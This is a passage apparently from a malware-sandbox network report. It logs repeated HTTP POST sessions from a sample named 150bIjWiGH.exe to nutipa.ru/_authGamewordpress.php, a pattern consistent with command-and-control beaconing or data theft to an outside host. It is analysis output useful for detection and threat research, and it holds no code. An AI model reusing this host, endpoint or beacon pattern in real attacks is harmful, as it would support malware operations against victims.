                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:45.716994047 CET  1420               OUT        POST request body
                                                            Dec 15, 2024 19:36:46.460722923 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:46.721240997 CET  941                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SdEsRwhSiWA6LVTKunA5143Pe3b5GJ%2FjTYpw31xel8yG1rZY%2Bg9WURwcA4uu4ztxPLlao9wr7RGFYUk9qo8hq6b3MaTYEvlGD5Qt4f6LBe4EH7KZ4O1FnigLWTc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a8569900f73-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4467&min_rtt=1618&rtt_var=6306&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=59799&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            17          192.168.2.4  49762        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:45.634032965 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:45.982326984 CET  2536               OUT        POST request body
                                                            Dec 15, 2024 19:36:46.721443892 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:47.005464077 CET  791                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTMbKTRkEKTz9QEwfxqkEed7WBCrDzPdjB0Go8ednnS2Y1keZqGwxj4l5N7KoLdQvlUEWLQalo2b4HbqigstvrQH2QI%2Bn2IaQRrMoS5uw2Q3lKtY84g4GE8f2yw%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a870c294392-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3173&min_rtt=1677&rtt_var=3621&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=106991&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            18          192.168.2.4  49763        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:47.397589922 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:47.747931957 CET  2536               OUT        POST request body
                                                            Dec 15, 2024 19:36:48.488642931 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:48.739379883 CET  799                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QCEEA2TdyC6OBa%2FoifRhssbgLt%2B2RMaGrTjfZgoa5htXclWaEYQ6tnBGwznis2kvyFtz5ci1qnkHF6KbK%2FBtqtZ33%2BpEatIK2LDgZmnqk%2BZTDrxLMd1So9EuQTg%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a921f564379-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2928&min_rtt=1682&rtt_var=3124&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=125246&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            19          192.168.2.4  49764        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:48.981509924 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:49.326411963 CET  2536               OUT        POST request body
                                                            Dec 15, 2024 19:36:50.070393085 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:50.312042952 CET  795                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvKLmQoCPv1ryMJSlrxC7PYXtTXsLF%2FxRzVXuu5uSXVru9rs4nm3Z3xJ458Gq08hr%2F8SKiSobPhL6qgvdpZqK8QZ208Ll0der16A6vS6qR%2Bxpyksv3q6xu8jkAQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a9bf87842a7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6681&min_rtt=1661&rtt_var=10664&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=34905&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            20          192.168.2.4  49765        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:50.581423044 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            21          192.168.2.4  49766        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:50.828325987 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:51.187767029 CET  2536               OUT        POST request body
                                                            Dec 15, 2024 19:36:51.923800945 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:52.207075119 CET  794                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vqu%2BOYHdCGeENmO44%2F3zNqUu2NjRkmoXVDt3Xz%2FdMVZAX6JFiHvkszmkU5rzEccJiLE2Ptns5DMxs5tguLDiaL6G8Z5AbvPE96OWU61atZeFfggvh7mL8qclVA0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288aa799524364-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3870&min_rtt=2293&rtt_var=4015&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=97901&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            22          192.168.2.4  49767        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:51.854578018 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:52.201206923 CET  1420               OUT        POST request body
                                                            Dec 15, 2024 19:36:52.939788103 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:53.207962036 CET  948                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTKXVTL0GE8%2B818zNDxDj%2Fv2Taj8xuc7FPXIMsbKot0Px%2FYlw1MOFafCiWslTI%2BvJP8UfZxf8Ayeoz4c8c7hWeM4THylsQ0V3w4ocPjJTrHtfiVRk8rv%2FuwzsXE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288aadecb043b9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3177&min_rtt=1703&rtt_var=3586&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=108188&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            23          192.168.2.4  49768        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:52.445888042 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:52.794797897 CET  2536               OUT        POST request body
                                                            Dec 15, 2024 19:36:53.531693935 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:53.789135933 CET  790                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uUXjxfIzY0sILGwWCuLwfLXBFSkZk8dCblO8iUkpXIVFh5wDChUAlfh0E0KhSaUq89eTbcCGrIVtmzm9loTHP2SRcK3RWFe55otKhR0m3qGERlYJCzHyOpLXO%2Bg%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ab19a7542e2-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3350&min_rtt=1650&rtt_var=4018&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=95737&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            24   192.168.2.4   49769   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:36:54.049393892 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:55.141838074 CET   25   IN   HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:55.385963917 CET   798   IN   HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dwy0IJa000S8Q5NRJCOPKokDBVq6gAg5leYQuOOqf%2F0DWLsPeSTWKvCty0zjxkUplbKEdrp5Afg4ZJF%2FPqiWEfJ%2FedTeHd0fy9E60UE%2Flvm1Mi6%2BXHAVu8I7fRo%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288abba82a7ce4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3667&min_rtt=2027&rtt_var=4041&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=96369&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            25   192.168.2.4   49770   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:36:55.643879890 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:56.725564957 CET   25   IN   HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:56.987046957 CET   802   IN   HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h3B5zazHm9v%2BsFCX%2BWTPUzwW3lgQytKb2oYjHoiWzpyo9iDyIGc3W8QViyeERwrFoCerHFw6hJU%2BrFtH7%2BiaQPDBNXNa9TFMjLZc0LyAz%2B%2BjwB2g3nfe%2FRqr8Pk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ac59f4d43dc-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4715&min_rtt=1798&rtt_var=6509&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=58074&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            26   192.168.2.4   49771   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:36:57.231673002 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:58.319809914 CET   25   IN   HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:58.573551893 CET   794   IN   HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjZyyT138YEMoG4fwfEW7vWWXvNmg8odxCZccGykVO8UI4%2BEn6O5pGxUJX8d1fK4PIWtGF0dcX%2BvoWLVMUiRYh6auLqxUGVf%2BSCvxqKZV7fcFvw8fV7kagxPRJk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288acf8ba9427f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5095&min_rtt=2235&rtt_var=6559&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=58123&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            27   192.168.2.4   49772   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:36:58.338721991 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:59.436161995 CET   25   IN   HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:59.692468882 CET   945   IN   HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Akj2TzcJjLiK%2F56t6fDwCbLKgSs69A84n%2ByX5nRKntuQP8WzOw1H65IiAbAN77NkFal0rJo9AXx5CSVGW%2BsZGITEDAWiUhdE0pmJMMPfXvHfRnoBdHHFXnGjMA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ad68d4a5e6e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=14378&min_rtt=9357&rtt_var=13552&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=29476&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            28   192.168.2.4   49773   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:36:58.823796988 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:59.921649933 CET   25   IN   HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:00.164580107 CET   796   IN   HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVBlxFvCS1OlF9PN7%2FS%2BfAWZ7amztISxApljerUGmGRd11i43sAaHU%2BfWaNS4WlnYYpdMG2lgO4N0ncnQNyYVhsYjZP9tDADsE5N8R3A7E2j1G92T%2FA5zuUV0Ho%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ad98a0c4361-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3967&min_rtt=1737&rtt_var=5111&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=74573&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            29   192.168.2.4   49774   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:37:00.416440964 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:01.504556894 CET   25   IN   HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:01.740034103 CET   799   IN   HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Kx%2Fq5lZVislhRApFYMgJ9f4mgvkCMX3ILm3tM9%2FXfKgGj7dwf1uZyGselsoPSqnDzh8Kxn0YxDeDpePOorjQQF%2BTkUce8JosFgR9Zr%2BXAAEeoluK1FKmx%2Bs9Ls%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ae37ec78cc3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3782&min_rtt=2591&rtt_var=3355&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=120402&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            30   192.168.2.4   49775   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:37:01.973566055 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:03.059873104 CET   25   IN   HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:03.311392069 CET   794   IN   HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UowF9PCCW1bmkWHZ5x%2BLXEyNBTRn0pY%2BUvNdUC95fcNFsyJVKkA9wTldLuL2FKQb78xZAaGH7bxZ%2BXbjRXSR5wMcPx3VMOhkbKNEceK5XDghGDrSWSx4ZIInkPs%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288aed2e62726f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4230&min_rtt=2004&rtt_var=5205&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=73666&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            31   192.168.2.4   49776   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:37:03.694891930 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
